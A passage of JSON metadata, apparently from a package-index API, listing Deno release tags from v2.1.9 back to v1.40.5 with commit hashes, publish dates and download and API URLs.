1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T